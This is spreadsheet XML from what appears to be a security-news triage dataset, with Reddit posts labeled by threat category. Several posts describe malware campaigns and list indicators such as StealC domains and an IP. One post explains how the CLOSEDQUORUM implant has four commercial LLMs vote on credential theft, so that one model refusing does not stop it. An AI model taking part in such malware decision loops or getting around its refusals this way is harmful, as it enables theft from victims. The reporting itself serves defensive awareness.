  <si>
    <t>Buenas! Quiero compartir un juego que hizo un amigo para android: https://play.google.com/store/apps/details?id=com.pumiri.robot.runner El juego lo hizo en su momento en un curso y ahora lo exporto a Android. Si pueden puntuarlo, comentarlo y jugarlo lo ayudarían mucho. [link] [comments]</t>
  </si>
  <si>
    <t>C-308</t>
  </si>
  <si>
    <t>From fake interview to signed ClickOnce: inside a three-payload Windows chain (Part 2)</t>
  </si>
  <si>
    <t>C-309</t>
  </si>
  <si>
    <t>Tecnicatura en Análisis de datos UBA o alternativas mejores</t>
  </si>
  <si>
    <t>Buenas buenas, ¿Cómo están? Tal cual el titulo, tengo 29 años, vengo de una carrera nada que ver (a lo sumo me aporta "pensamiento critico" jejox) y estoy viendo como insertarme en el mundo it porque lógicamente es el futuro y no quiero ser plomero lamentablemente y muy a mi pesar. Mi idea es formalizar un plan para insertarme en el mercado laboral relativamente rápido y empezar a ganar exp, me interesaria pivotear para Data Science o Machine Learning y similares (capaz seguridad o Data Engineering, pero aparenta complicadito para llegar sin ser dev o ing antes). Empiezo desde 0, tengo un poquito de exp en data entry y data analyst, me gusto bastante lo poco que hice (muy muy muy esencial). Sin mas preambulos busco consejos, experiencias, informacion y bueno, alternativas mejores para ir haciendo mi perfil en el ambito. Siempre veo que los mandan a todos a estudiar plomeria porque la ia esta cacheteando juniors a mansalva, la idea del post no es eso pero son libres de, quien soy yo para inhibirlos Agradezco con antelación todas las sugerencias, feedbacks y experiencias que se puedan aportar, muchas gracias y un saludito [link] [comments]</t>
  </si>
  <si>
    <t>C-310</t>
  </si>
  <si>
    <t>Como era ser Dev en 2020/2021?</t>
  </si>
  <si>
    <t>Hola. Pregunto más que nada por curiosidad y porque quiero saber que es verdad y que no. Yo estaba en el colegio en 2020 y ya sabía programar y me gustaba bastante, el tema es que cumpli 18 a fines de 2020. Y me gradué de colegio de informática, no técnico. Sabía masomenos Python, un poco de Java, html y css. Y un poco de C, las estructuras básicas y dominaba bastante bien la lógica, que siempre me gusto. Podría haber conseguido trabajo en esa época en alguna pyme o empresa grande? Mediante algún programa? O algo similar? Conocen algún caso como el mío pero que haya tenido exito? Entonces hoy en día mi duda es como era realmente en esa epoca. Porque siempre leo que acá dicen que con saber hacer cosas mínimas ya te tomaban de cualquier lado. Y por otro lado leo gente que dice que incluso en esa época le llevo tiempo conseguir su primer trabajo y no fue fácil. Entonces quería preguntar cómo era realmente el mercado para los que buscaban su primer trabajo sin experiencia en el rubro. Gracias. PD: Intenté buscar publicaciones de esa época en este sub pero no hay nada porque se creo después creo. Que sub se usaba para desarrollo en argentina en esa época, si pueden pasar publicaciones de esa época sería mejor. Gracias [link] [comments]</t>
  </si>
  <si>
    <t>C-311</t>
  </si>
  <si>
    <t>Alguna otra pasion con la compu (ademas de desarrollar)?</t>
  </si>
  <si>
    <t>Hola amiguitos! Aca un viejo lobo de mar de mas de 45 que labura en IT desde los 20! Queria saber si a alguno le pasa que, a pesar de que les gusta su trabajo de desarrollador, tienen otras pasiones con la PC/tecnologia? No me refiero a algo fuera de la PC, como tocar algun instrumento, andar en bici, gym, etc.. todos tenemos algo de eso. Quiero saber si hay gente como yo, que le cuesta horrores despegarse de la compu (aun despues de terminar el horario laboral, que encima trabajo remoto), y siguen disfrutando de estar sentado o con la computadora/o una consola/o tablet/o lo que sea de ese lado. Yo arranque con la PC a los 8 con la 286, y ya casi que sabia que era lo mio para siempre. Ahora tengo familia, 2 nenas, con la mas grande de 5 ya jugamos al minecraft en red, al mario kart en la switch, le pongo emuladores, etc etc, y los dos chochos de la vida. No se si es lo mejor (tambien le hago hacer otras actividades obvio), pero disfruto muchisimo estar en la compu jugando en familia y mientras ella aprenda, no le encuentro nada negativo. Tambien termine y publique un juego en steam (con que venda 1 copia estamos), me puse a instalar LLMs locales (de chat y de generacion de imagenes), escucho musica, peliculas, pero siempre enfrente de la PC. No es una adiccion porque se que puedo cortar cuando quiero. Pero es mi lugar en el mundo y no lo cambio por nada! Saludos! [link] [comments]</t>
  </si>
  <si>
    <t>C-312</t>
  </si>
  <si>
    <t>[RANT] cuántos ux se necesitan en Santander para poner un link al online banking?</t>
  </si>
  <si>
    <t>C-313</t>
  </si>
  <si>
    <t>Que tal esta el mercado de la programación?</t>
  </si>
  <si>
    <t>C-314</t>
  </si>
  <si>
    <t>frontier class vulnerabilities: it gets worse before it (maybe) gets better</t>
  </si>
  <si>
    <t>C-315</t>
  </si>
  <si>
    <t>ATT&amp;CKing TACACS+ to Pwn Your Network via a Pre-Auth RCE - elttam</t>
  </si>
  <si>
    <t>C-316</t>
  </si>
  <si>
    <t>🍻 Offtopic semanal — contá tu semana, memes dev y lo que pinte</t>
  </si>
  <si>
    <t>C-317</t>
  </si>
  <si>
    <t>New Local Privilege Escalation on Acer laptops</t>
  </si>
  <si>
    <t>C-318</t>
  </si>
  <si>
    <t>Tengo que hacer un servidor y no tengo ni puta idea</t>
  </si>
  <si>
    <t>Bueno, me va a ser difícil presentar todo pero intentaré resumirlo.. Estoy estudiando en un colegio técnico en informática y estamos haciendo un servidor con servicios como proyecto final del año. Conformo en un grupo de 3 integrantes, contamos con un servidor hp (debe tener más de 10 años) de 64gb ram, 2 procesadores de 8 núcleos, 2 hdd (120 gb en total, siendo que tiene raid 1 y 5) Las funcionalidades que debemos meterle son: \- servicio de correo \- guardar páginas web (para manejar el servicio de correo) \- hacer una database \-copias de seguridad Usaremos 2 vm: \-Windows server, una versión vieja, ya que la 2022 me molesta con los controladores al instalar(no tengo ni idea, perdí 2 horas de trabajo en eso) \-Ubuntu server, (lo tuve que intentar instalar 3 veces y al tratar de configurar el apartado ip, no tengo ni puta idea, aprendo sobre la marcha) Podría excusarme diciendo que el profesor es un cabron (que en parte lo es al reírse de como sufro con esta cosa) y que soy el único de mi grupo tratando de trabajar pero bueno, en el tiempo que debería haber usado para investigar todas las cosas que no sabía, estaba de viaje de egresados y ahora.... me siento más tonto que antes. ¿Hay alguna buena guía para hacer un servidor? Todos los que he visto son confusos y tengo miedo de terminar borrando todo como a cierto compañero mio.... El feedback y consejos me ayudarían Tengo 1 día a la semana para trabajar y el fin es el 14 de noviembre aproximadamente [link] [comments]</t>
  </si>
  <si>
    <t>C-319</t>
  </si>
  <si>
    <t>Flaco te pedí la hora...</t>
  </si>
  <si>
    <t>Se me puso sentimental el harness... y yo me quiero ir a dormir jaj. [link] [comments]</t>
  </si>
  <si>
    <t>C-320</t>
  </si>
  <si>
    <t>CVE-2026-91768: FastCGI allowed_clients compared only 96 of an IPv6 address's 128 bits</t>
  </si>
  <si>
    <t>C-321</t>
  </si>
  <si>
    <t>⚠️ URGENT WARNING: Fake "VRChat-DLSS5-Cam" GitHub repository is a dangerous Infostealer Malware (SmartLoader)</t>
  </si>
  <si>
    <t>Hi everyone, I want to issue an urgent security warning regarding a trending YouTube campaign promoting a tool called "VRChat-DLSS5-Cam" hosted on GitHub (under the user seefn1000-afk). https://github.com/seefn1000-afk/VRChat-DLSS5-Cam THIS IS A SOPHISTICATED MALWARE TRAP. DO NOT DOWNLOAD OR RUN IT. https://preview.redd.it/7fooqrtg4dvh1.png?width=1419&amp;format=png&amp;auto=webp&amp;s=116efd93c29662dc9cb782cfc800c30b2873ffab Here is the breakdown of the technical evidence proving this is a scam, including how the hacker bypassed automated security filters to trick users: The Ultimate Proof: Globally Blacklisted by URLhaus This is not a guess; it is verified by global threat intelligence. The exact download link embedded in the repository's README (.../resources/VR-DLS-Cam-Chat-v3.3.zip) has been officially investigated and blacklisted by Abuse.ch URLhaus (Database ID: 3931216). https://urlhaus.abuse.ch/url/3931216/ https://preview.redd.it/h3hsewii4dvh1.png?width=1172&amp;format=png&amp;auto=webp&amp;s=58e61a3e7a953fa4999d99e4c7fbe1a211ebb7dd Threat Type: Malware download (SmartLoader / LuaJIT-loader). Behavior: Once clicked, it silently drops a malicious payload containing Application.bat and cli.exe into your system to steal browser passwords, active session cookies, Steam configurations, and Discord tokens. The GitDiagram Illusion (How they fooled advanced users) https://preview.redd.it/17yfdd6j4dvh1.png?width=1136&amp;format=png&amp;auto=webp&amp;s=53eb7db310b96d28f3c28bffc08024c7ff7034b0 The hacker went out of their way to make the project look professional by uploading non-functional, stolen C++ files (main.cpp, App.cpp, DlssnrFeature.cpp) so that tools like GitDiagram would generate a massive, highly detailed system architecture map. The Reality: The system diagram shows fake components like NvOpticalFlow.cpp and DepthEstimator.cpp claiming to calculate depth maps externally via a "Spout Capture". Physically, a 2D Spout video feed cannot mathematically calculate Unity's 3D game engine depth buffer from the outside without native engine integration. The Trap: Automated repository scanners only checked the clean, text-based C++ placeholder files, giving it a "LOW RISK" score based on only 2% file coverage. The remaining 98% of the data—the actual virus—is hidden inside the un-scanned .zip archive. The Technical Lies DLSS 5 Does Not Exist: NVIDIA’s current commercial technology is DLSS 3, with active AI research moving into DLSS 4 branches. There is absolutely no official "DLSS 5" on the market. GTX 1060 Hardware Impossibility: The repository claims to run "DLSS Neural Rendering" on a GTX 1060. GTX cards physically lack Tensor Cores, making it architecturally impossible for them to compute neural network rendering models. Current Action Taken This repository has been officially reported to GitHub Trust &amp; Safety under the Article 16 Digital Services Act (DSA) regulatory framework for immediate removal. If you see YouTube videos pushing this "DLSS 5 camera mod" with beautiful vis</t>
  </si>
  <si>
    <t>C-322</t>
  </si>
  <si>
    <t>gestor de gastos personal</t>
  </si>
  <si>
    <t>gordos para hacer un gestor de gastos propio (no el tipico para que usen todos) sino dejarlo corriendo en mi srv, como hacen o como puedo hacer para tracker los gastos de mp? alguna idea, proba con la api pero es para locales, los correos que te manda por transferencia aveces salen aveces no [link] [comments]</t>
  </si>
  <si>
    <t>C-323</t>
  </si>
  <si>
    <t>From: anyone@icloud.com - Spoofing Arbitrary Apple iCloud Identities</t>
  </si>
  <si>
    <t>C-324</t>
  </si>
  <si>
    <t>Invoice-named scripts drop a DLL-sideloading backdoor behind Pakistan Navy decoys</t>
  </si>
  <si>
    <t>C-325</t>
  </si>
  <si>
    <t>The £3 WiFi Extender With a Backdoor in Every Unit</t>
  </si>
  <si>
    <t>C-326</t>
  </si>
  <si>
    <t>TuxBot v3 Evolution: an IoT botnet-as-a-service framework built with LLM-generated code</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/tuxbot-v3-evolution-iot-botnet/ TuxBot v3 Evolution: an IoT botnet-as-a-service framework built with LLM-generated code, shipped with the AI’s chain-of-thought and safety disclaimers still in the source [link] [comments]</t>
  </si>
  <si>
    <t>C-327</t>
  </si>
  <si>
    <t>Meccha Chameleon's Workshop Malware Is the Second Time This Exact Bypass Has Hit Steam This Month</t>
  </si>
  <si>
    <t>C-328</t>
  </si>
  <si>
    <t>1.6 Million combined installs famous extension ModHeader - Modify HTTP headers removed for Malware</t>
  </si>
  <si>
    <t>Google has flagged the widely-installed HTTP header editor ModHeader as malware Microsoft already pulled it from Edge on July 3. [MalExt Sentry - Malicious Browser Extension Tracker](https://malext.io/?q=ModHeader) * 900k installs on chrome | idgpnmonknjnojddfkpgkljpfnnfcklj * 700k installs on edge | opgbiafapkbbnbnjcdomjaghbckfkglc [link] [comments]</t>
  </si>
  <si>
    <t>C-329</t>
  </si>
  <si>
    <t>Reversing Windows Infostealer: Warden Stealer’s hidden payload, C2 and ten-network crypto clipper</t>
  </si>
  <si>
    <t>C-330</t>
  </si>
  <si>
    <t>Operation Endgame disrupted hundreds of systems — a StealC backend I reported still exposes its known routes</t>
  </si>
  <si>
    <t>In April, I documented a StealC v2 campaign distributed through 19 GitHub typosquat repositories, including one impersonating my own open-source project. The delivery chain was: text GitHub typosquat -&gt; Python dropper -&gt; api.nailproxy.space -&gt; encrypted Windows loader -&gt; StealC v2 DLL -&gt; spellmarketplace.club / 62.60.226.113:6673 GitHub later removed all 19 repositories. The backend infrastructure remained a separate problem. I reported the domains, IP, malware routes, and hashes to the relevant registrars, Cloudflare, the hosting provider, CERT-Bund, GitHub Security Lab, ThreatFox, and AlienVault OTX. Then Operation Endgame disrupted infrastructure associated with SocGholish, Amadey, and StealC. Europol reported 326 servers and 142 domains actioned. Microsoft separately said it moved against more than 200 malicious Amadey and StealC C2 domains and IPs. Three months after my original disclosure, I checked the known infrastructure again using only minimal unauthenticated GET and HEAD requests. The documented malware-specific routes still behave differently from an arbitrary control path: text GET /api/v1/auth/session -&gt; 405 Method Not Allowed GET /api/v1/data/sync -&gt; 405 Method Not Allowed GET /foo/bar/baz -&gt; 404 Not Found HEAD returns the same status codes for all three paths. This does not prove that payload delivery, authentication, or exfiltration still works. I deliberately did not send the HMAC handshake, trigger Stage 2, or interact with the malware protocol. It does show that the known application routes remain registered and reachable. The evidence also has limitations: The monitoring cron produced only 18 measurements over 69 days. There were gaps of up to 20 days. The endpoints briefly became unreachable in late May. GET and HEAD return different status codes on the root paths of spellmarketplace.club and the bare IP, so I do not treat those checks as proof that the complete backend is operational. The point is not that Operation Endgame failed. It clearly disrupted a large amount of criminal infrastructure. The narrower lesson is that both of these statements can be true: Hundreds of malicious systems were disrupted. A specific previously reported backend still exposes its documented malware routes. Full technical write-up, including the original kill chain, abuse-report timeline, ThreatFox/OTX submissions, current probe results, and evidence limitations: https://blog.technopathy.club/operation-endgame-stealc-backend-still-responds I would be interested in how other analysts verify whether previously reported C2 infrastructure was actually included in a large takedown without actively engaging the malware protocol. [link] [comments]</t>
  </si>
  <si>
    <t>C-331</t>
  </si>
  <si>
    <t>Experiencias / opiniones CFOTech</t>
  </si>
  <si>
    <t>Buenas gente, me contactaron de esta consultora para un puesto backend Java SR híbrido, ofrecen 4.5M bruto. Tengo casi 5 años de experiencia. Tienen experiencias con esta consultora? Toda info ayuda, busqué y lei threads anteriores pero me gustaria info más actual. Saludos! [link] [comments]</t>
  </si>
  <si>
    <t>C-332</t>
  </si>
  <si>
    <t>Con quién alquilan VPS?</t>
  </si>
  <si>
    <t>Cómo andan? Tengo que alquilar un vps para hostear un par de webs y apps, puras boludeces la verdad. Cuál es el mejor proveedor de Argentina? Donweb? Hostinger? Hay alguna gema escondida? Gracias de antemano y no escucho pelotudos 😁 [link] [comments]</t>
  </si>
  <si>
    <t>C-333</t>
  </si>
  <si>
    <t>Beware of sophisticated Gmail / Google phishing attack</t>
  </si>
  <si>
    <t>C-334</t>
  </si>
  <si>
    <t>¿Valen la pena los cursos de Santander Academy?</t>
  </si>
  <si>
    <t>C-335</t>
  </si>
  <si>
    <t>Rockstar Games has now been compromised several different ways since 2018, and none of them were a zero-day</t>
  </si>
  <si>
    <t>Four incidents, four completely different initial access paths: 2022, Lapsus$: MFA fatigue against an employee, then hardcoded creds and API keys sitting in plaintext in Slack and Confluence. Early 2023, GTA Online: P2P netcode on PC reverse-engineered into RCE via malicious packets. The fix was kernel-level BattlEye. April 2026, ShinyHunters: no human identity involved. Long-lived OAuth tokens stolen from a third-party SaaS vendor and replayed straight into Rockstar's Snowflake. Bearer tokens confer authority by possession alone. August 2026, Cyberleek: exfiltration of a playable GTA VI dev build, 13+ gameplay videos and full map data. That volume of egress from a dev subnet without tripping alarms is a DLP and segmentation failure. The writeup reconstructs each attack chain with MITRE mappings and detection strategies: egress baselining on dev subnets, Slack audit-log heuristics, and behavioral baselines for non-human identities in Snowflake. Full breakdown: https://www.lares.com/blog/rockstar-games-attacks/ Question for the defenders here: which of these four would be hardest to catch in your environment? The OAuth token replay is arguably the nastiest of the bunch. No user to phish-train, no endpoint alert to fire. [link] [comments]</t>
  </si>
  <si>
    <t>C-336</t>
  </si>
  <si>
    <t>Necesito algún consejo por favor</t>
  </si>
  <si>
    <t>Llevo 3 años trabajando en programación, aunque siento que nunca aprendí bien de forma estructurada. Muchas veces he tenido que apoyarme en IA para cumplir con tareas del trabajo o proyectos, y eso me hace sentir que estoy sobreviviendo más que creciendo. He intentado aprender varias cosas a la vez, luego cambiar de ruta, probar cursos, métodos, frameworks, fundamentos, etc., pero siento que he perdido mucho tiempo y sigo sin una base sólida. Actualmente trabajo como “programador”, pero en la práctica hago una mezcla de soporte, backend, frontend, consultas SQL, despliegues, QA, entender sistemas legacy y resolver problemas urgentes. Todo por un sueldo bastante bajo. Lo que más me está desgastando de esta carrera es: - La falta de documentación. - Código legacy donde nada parece tener sentido. - La presión de arreglar cosas rápido sin entender bien el flujo. - No tener una guía real ni feedback técnico. - Tener un jefe que tampoco puede orientarme mucho técnicamente. - La sintaxis y lectura de código; muchas veces siento que leo algo incomprensible. - Tener que saber demasiadas áreas a la vez: backend, frontend, seguridad, despliegue, QA, base de datos, etc. - La sensación de que con IA habrá menos oportunidades, especialmente para gente con bases débiles como yo. No sé si realmente odio programar, o si odio el tipo de trabajo en el que caí: sistemas legacy, poca guía, presión y mucha improvisación. Estoy considerando moverme a algo relacionado pero menos centrado en programar todo el día, como análisis de datos, BI/Power BI, QA manual, soporte aplicativo o analista funcional/ERP. ¿Alguien pasó por algo parecido? ¿Creen que vale la pena insistir en programación desde fundamentos, o sería más sensato moverme a un rol más funcional/datos/QA? ¿Qué camino recomendarían para alguien con experiencia desordenada, algo de SQL, algo de web, pero mucho desgaste con código? [link] [comments]</t>
  </si>
  <si>
    <t>C-337</t>
  </si>
  <si>
    <t>How I Found a $113,337 AF_ALG Linux Local Privilege Escalation Before Copy Fail</t>
  </si>
  <si>
    <t>C-338</t>
  </si>
  <si>
    <t>Cisco just found Windows malware that runs four AI models simultaneously and lets them vote on what to steal from your computer, with no human attacker giving orders</t>
  </si>
  <si>
    <t xml:space="preserve">This is the one that changed how security researchers are thinking about AI-driven malware, and it's worth understanding even though the current version isn't fully operational yet. Cisco Talos disclosed CLOSEDQUORUM on September 22. It's a Windows implant written in Go that, once running on a machine, doesn't report back to an attacker's server and wait for commands like normal malware does. Instead it sends basic facts about the infected computer to four commercial AI services at once, DeepSeek, Qwen, Mistral, and Google Gemini, and lets them vote on what to do next. The malware sends each model the machine's hostname, Windows version, and administrator status, along with a fixed menu of four possible actions: steal, inject, persist, or move. Each model picks one. The malware counts the votes and executes whichever action wins the plurality. DeepSeek breaks ties. If no model responds in the required format, the malware waits and tries again rather than defaulting to anything. The steal action goes after Windows credentials, saved browser passwords, and cryptocurrency wallet data. The inject action covers process injection into running programs. Persist means embedding itself so it survives reboots. Move, in the current public version, has no implementation yet — it's a placeholder. The reason Cisco Talos is treating this as significant rather than just another malware disclosure: the attacker doesn't need to be online or issue commands once the malware is deployed. They're removed from the tactical decision loop entirely. Talos called this "effort displacement" in their write-up. They put it directly: human operators are bound by attention, working hours, and cognitive load. An AI system that decides what to do next can keep working when the operator is asleep or simply not watching. To be precise about the current state: the public version has placeholder API keys so it doesn't fully work end-to-end, and Talos hasn't confirmed a complete deployment in a real attack. The malware's internal analysis code is dated June 17, 2026, making it at least three months old. Code clues link the developer to carding forums going back to 2025. Alongside the CLOSEDQUORUM disclosure, Talos released CAIRN, an open-source framework specifically built to detect malware that integrates AI services into its operation. They said AI-integrated malware went from "optional AI features" to "fully autonomous multi-model consensus" within one calendar year. One detail worth understanding: using four models and a plurality vote isn't just for redundancy. If any single model's safety guardrails refuse a request, the other three can still vote, and the vote passes anyway. The four-model structure bypasses individual guardrails by design. If CLOSEDQUORUM or anything like it ends up deployed on a machine you use, the credential theft functions target exactly the kind of data that surfaces on dark web markets. Sources: The Hacker News, Cisco Talos, Security Affairs, TechTimes, </t>
  </si>
  <si>
    <t>C-339</t>
  </si>
  <si>
    <t>WordPress malware in official WooCommerce theme (Kiosko): hidden admin users and corrupted sitemap</t>
  </si>
  <si>
    <t>I recently dealt with a WordPress infection on a site using the official WooCommerce Kiosko theme. The malware added suspicious PHP files in the root (adszx.php, wp-activajetbxzm.php, etc.) and injected code into the theme’s functions.php, creating hidden admin users (adminisz1, adminisz2, etc.) and corrupting the sitemap_index.xml. After cleaning up, I’m left wondering: Has anyone else experienced something similar with this theme or in general? It’d be good to know if this is a known issue or if others have faced the same. [link] [comments]</t>
  </si>
  <si>
    <t>C-340</t>
  </si>
  <si>
    <t>C-341</t>
  </si>
  <si>
    <t>🐁 Analyzing EtherRAT internals: Ethereum smart contract C2 in a Node.js backdoor (The Gentlemen)</t>
  </si>
  <si>
    <t>EtherRAT off a The Gentlemen staging server. C2 resolution is the fun part: no hardcoded domains. The sample holds an Ethereum contract address + call selector and pulls the active C2 from the contract via public RPC endpoints. Every operator rotation is a contract write, so the full history is recoverable, five domains here. Tasking has no fixed command set. Any response over ten chars is thrown into a new async function with require, process, Buffer, etc. in scope, so arbitrary JS in the user context. Polls use random file-like paths (png/css/ico) to blend in, tell is a custom X-Bot-Server header. MSI drops a Node bootstrapper + XOR-encrypted backdoor, decoder writes plaintext and sets a Run key relaunching via headless conhost. Full write-up with hashes and IOCs: https://hunt.io/blog/the-gentlemen-etherrat-ethereum-smart-contract-c2 [link] [comments]</t>
  </si>
  <si>
    <t>C-342</t>
  </si>
  <si>
    <t>No Extensions? You Forgot One: Writing Shared Objects to RCE via SQLite's dbpage</t>
  </si>
  <si>
    <t>A novel technique for writing ELF shared objects and achieving code execution in Python, Ruby, and Node.js using the sqlite_dbpage virtual table. [link] [comments]</t>
  </si>
  <si>
    <t>C-343</t>
  </si>
  <si>
    <t>Argus Monitor Local Denial-of-Service Vulnerability (CVE-2026-79417)</t>
  </si>
  <si>
    <t>(1) An exposed IOCTL lets unprivileged users disable the x86 MONITOR &amp; MWAIT instructions used by Hyper-V and other kernel components--triggering a HYPERVISOR_ERROR bugcheck. (2) Reaching the IOCTL requires exploiting a TOCTOU bug arguably caused by poor documentation of the SeLocateProcessImageName function. (3) Reimplementation of the driver's security through obscurity IOCTL encryption scheme: SHA-256 KDF-derived XOR keystream &amp; CRC16 Checksum. See full write-up, and Github for PoC. [link] [comments]</t>
  </si>
  <si>
    <t>C-344</t>
  </si>
  <si>
    <t>Makop: The Human-Operated Ransomware Targeting Exposed RDP</t>
  </si>
  <si>
    <t>C-345</t>
  </si>
  <si>
    <t>rust Crate arrayref (245M downloads) was compromised</t>
  </si>
  <si>
    <t>C-346</t>
  </si>
  <si>
    <t>Buenas hice una pagina para ver los precios de los juegos en steam, gog, epic y switch.</t>
  </si>
  <si>
    <t>C-347</t>
  </si>
  <si>
    <t>They got the guy behind the Steam Malware attacks</t>
  </si>
  <si>
    <t>A man from Florida got arrested, allegedly behind the PirateFI and Blockblasters Crypto stealer attacks. The second Game stole 150k from a cancer Patient. https://www.tomshardware.com/tech-industry/cyber-security/fbi-arrests-florida-man-in-steam-malware-investigaton-after-tracing-stolen-bitcoin-to-uber-eats-gift-cards [link] [comments]</t>
  </si>
  <si>
    <t>C-348</t>
  </si>
  <si>
    <t>Cuantas horas requiere una instalación fresca de TrueNas ?</t>
  </si>
  <si>
    <t>Quería saber cuanto se cobra la instalación de TrueNas? cuantas horas lleva? Es un ISP que alquila maquinas virtuales con VMware [link] [comments]</t>
  </si>
  <si>
    <t>C-349</t>
  </si>
  <si>
    <t>Practicing malware analyze after finish the Practical Malware Analysis book</t>
  </si>
  <si>
    <t>Im just graduated from college and currently an intern, after finishing the book they ask me to find a malware family on malpedia and start analyze a sample of that family. Im only working with malware within the book labs before. What sample should I start with? Thank you very much Update Im end up choosing the sample: c012d6850b13e52312b40cff42d444126d137a1ac88f5e77158b5089f6ed25ac At first it is not packed and im thinking "Thank god" but after looking at the import table and strings within the malware, it may have a lot of components like: Keylogger Credential Stealing (browser, mail client) Process injection UAC bypass, create backdoor user Persistence + Defender exclusion Remote shell It is the first time I work with malware this complicated, totally different from the labs. Where or how should I start analyzing the functions with IDA Pro? Thank you in advance [link] [comments]</t>
  </si>
  <si>
    <t>C-350</t>
  </si>
  <si>
    <t>Sobre el sentido de aprender vs la IA</t>
  </si>
  <si>
    <t>Veo posts de estudiantes que dicen que no tiene sentido ya aprender nada porque la IA lo hace todo, y no basta con leer esto, leo respuestas aún más sesgadas donde creen que porque un LLM hace un MVP, ya está condenada la ingeniería de software. Debo preguntarles: sin tener conocimiento profundo en las siguientes áreas, ¿han intentado...? ¿Programar un PLC? ¿siquiera un arduino sin quemar nada? ¿Operado o recetado medicamentos a humanos o incluso animales? ¿Siquiera se los permite la ley? ¿Han pintado una obra de arte? ¿esculpido estatuas de mármol e incluso madera? ¿Creado empresas exitosas? ¿Siquiera han dirigido alguna? ¿Escrito best-sellers? ¿Ganado demandas judiciales? ¿Diseñado la arquitectura de una obra civil? ¿Han hecho algo con IA de un tema donde no tienen dominio alguno y de hecho resuelva un problema serio y el resultado sea considerado profesional? ¿Por qué creen que los vibecoders no llegan a ningún lugar y ninguna empresa los contrata? Porque la IA por más potente que sea, necesita responsables detrás que sepan qué están haciendo, que pepito haya visto un curso pedorro de MoureDev o Gentleman IAgramming, donde les vendieron que con 5 prompts y 459891397812 ficheros .md van a lograr crear productos increíbles y ahora pepito esté vendiendole un SaaS pedorro a la barbería de la esquina que ni siquiera necesita, no hace a pepito un desarrollador ni experto en ninguna área de IT y ninguna empresa jamás le abrirá las puertas. Leí incluso en un post una pregunta bastante absurda... "¿Para qué debería invertir mi tiempo aprendiendo Redux si una IA me hace el trabajo al toque?" La respuesta es obvia, para SABER qué es redux y por qué usarlo, ¿qué piensan? ¿que en el futuro todos usarán un LLM para hacer todo y no importa lo que hay detrás? Además, suponiendo que pepito llegue lejos y venda software a gente que no le importa cómo se hace ese software, eventualmente pepito tendrá que enfrentarse a profesionales de todos los estilos que intentarán tumbar su aplicación, y tarde o temprano, pepito tendrá que aprender a administrar servidores o tendrá que pagar una infraestructura que sus 5 clientes que le dan 3 pesos, no le alcanzarán a cubrir porque una botnet lo dejó con el CPU en 100% y le tumbó el servidor (siendo generosos y si no es que metió credenciales en el repositorio o dejó puertos y credenciales por defecto, entre mil escenarios más). Yo era anti IA hasta que entendí que no funciona así, hoy más que nunca es valioso estudiar bien sea por cuenta propia o yendo a la universidad, y si el plan tuyo es conseguir empleo o emigrar, etc, lo mejor es conseguir el título y SABER hacer algo. La realidad siempre está en medio de los extremos que imaginamos, la IA no va a desaparecer y volveremos a ver salarios increíbles, pero tampoco puede cambiar el statu quo a los niveles ridículos que se imaginan y viene el fin de la humanidad... [link] [comments]</t>
  </si>
  <si>
    <t>C-351</t>
  </si>
  <si>
    <t>Cómo 03: Automatización y Reconstrucción con Ansible en CentOS Stream 10</t>
  </si>
  <si>
    <t>C-352</t>
  </si>
  <si>
    <t>A Single POST Freezes Any Next.js Server</t>
  </si>
  <si>
    <t>No relevante</t>
  </si>
  <si>
    <t>Phishing</t>
  </si>
  <si>
    <t>Etiquetado como Phishing porque es la causa raiz, pero tambien contiene Malware.</t>
  </si>
  <si>
    <t>Vulnerabilidades</t>
  </si>
  <si>
    <t>Malware</t>
  </si>
  <si>
    <t>Robo de Credenciales</t>
  </si>
  <si>
    <t>Infraestructura y Ataques</t>
  </si>
  <si>
    <t>Ransomware</t>
  </si>
  <si>
    <t>No hay información suficiente pero podría entrar en alguna categoría.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</si>
</sst>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3"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="E266" sqref="E266"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.88671875" defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="14" customWidth="1"/>
    <col min="2" max="2" width="48" customWidth="1"/>
    <col min="3" max="3" width="90" customWidth="1"/>
    <col min="4" max="4" width="14" customWidth="1"/>
    <col min="5" max="6" width="30" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="1" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="1" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="1" t="s">
        <v>4</v>
      </c>
      <c r="F1" s="1" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="2" spans="1:6" ht="60" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2" s="2" t="s">
        <v>6</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>8</v>
      </c>
      <c r="D2" s="2" t="s">
        <v>9</v>
      </c>
      <c r="E2" s="3" t="s">
        <v>929</v>
      </c>
      <c r="F2" s="2" t="s">
        <v>930</v>
      </c>
    </row>
    <row r="3" spans="1:6" ht="60" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3" s="2" t="s">
        <v>10</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>11</v>
      </c>
      <c r="C3" s="2" t="s">
        <v>12</v>
      </c>
      <c r="D3" s="2" t="s">
        <v>13</v>
      </c>
      <c r="E3" s="3" t="s">
        <v>928</v>
      </c>
      <c r="F3" s="2"/>
    </row>
    <row r="4" spans="1:6" ht="60" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4" s="2" t="s">
        <v>14</v>
      </c>
      <c r="B4" s="2" t="s">
        <v>15</v>
      </c>
      <c r="C4" s="2" t="s">
        <v>16</v>
      </c>
      <c r="D4" s="2" t="s">
        <v>17</v>
      </c>
      <c r="E4" s="3" t="s">
        <v>931</v>
      </c>
      <c r="F4" s="2"/>
    </row>
    <row r="5" spans="1:6" ht="60" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A5" s="2" t="s">
        <v>18</v>
      </c>
      <c r="B5" s="2" t="s">
        <v>19</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>20</v>
      </c>
      <c r="D5" s="2" t="s">
        <v>13</v>
      </c>
      <c r="E5" s="3" t="s">
        <v>928</v>
      </c>
      <c r="F5" s="2"/>
    </row>
